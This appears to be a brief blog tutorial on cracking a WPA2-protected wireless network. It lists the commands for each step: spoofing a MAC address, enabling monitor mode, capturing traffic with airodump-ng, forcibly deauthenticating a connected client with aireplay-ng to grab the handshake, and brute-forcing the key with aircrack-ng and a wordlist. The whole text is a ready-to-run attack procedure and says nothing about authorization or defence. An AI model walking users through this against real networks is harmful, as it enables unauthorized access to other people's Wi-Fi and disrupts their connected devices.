It’s fair to say WPA 2 has done a lot for wireless networks.
It’s made them more secure that’s for sure. However the threat is still out there… Turns out, hacking a WPA 2 encrypted network is pretty similar to cracking a WEP encryption. Let’s see how it’s done… These are the steps:
- 1. Put wireless interface down, spoof the mac address (optional) and put wireless interface in monitor mode.
- ifconfig wlan0 down
- macchanger –mac 00:22:44:66:88:00 wlan0
- airmon-ng start wlan0
- 2. Start sniffing the target wireless network on the specific channel, write capture to file.
- airodump-ng -c 1 –bssid Network MAC Addr. -w Capture File mon0
- 3. To capture the WPA handshake, either DeAuthenticate a connected host or wait for one to connect.
- aireplay-ng -0 0 -a Network MAC Addr. -h Your MAC Addr. -c Client MAC Addr. mon0
- 4. Now you are ready to crack using the WPA handshake and your wordlist.
- aircrack-ng –bssid Network MAC Addr. -w Wordlist Capture File
Note: Replace the underlined content on your own execution.
For further details, check out the video in high quality: